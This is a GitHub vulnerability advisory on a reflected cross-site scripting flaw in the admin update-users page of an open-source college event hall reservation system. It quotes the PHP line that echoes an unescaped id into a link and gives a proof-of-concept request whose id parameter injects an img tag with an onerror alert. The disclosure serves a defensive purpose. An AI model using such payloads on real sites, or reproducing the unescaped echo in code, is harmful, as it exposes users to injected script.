Skip to content

Latest commit

 

History

History
26 lines (19 loc) · 726 Bytes

File metadata and controls

26 lines (19 loc) · 726 Bytes

MAGESH-K21 / Online-College-Event-Hall-Reservation-System - Reflected XSS update-users.php

Credits

Joshua Lictan (https://github.com/skid-nochizplz/skid-nochizplz)

Vendor Homepage:

https://github.com/MAGESH-K21/Online-College-Event-Hall-Reservation-System/

Affected Component

/admin/update-users.php

Code

<a class="btn btn-secondary"  href='rooms.php?id=<?php echo $id; ?>'>Cancel</a>

Proof of Concept

HTTP Request Example

GET /admin/update-users.php?id="><img+src%3dx+onerror%3dalert("NoChizPlz")> HTTP/1.1
Host: [REDACTED]

Screenshot

image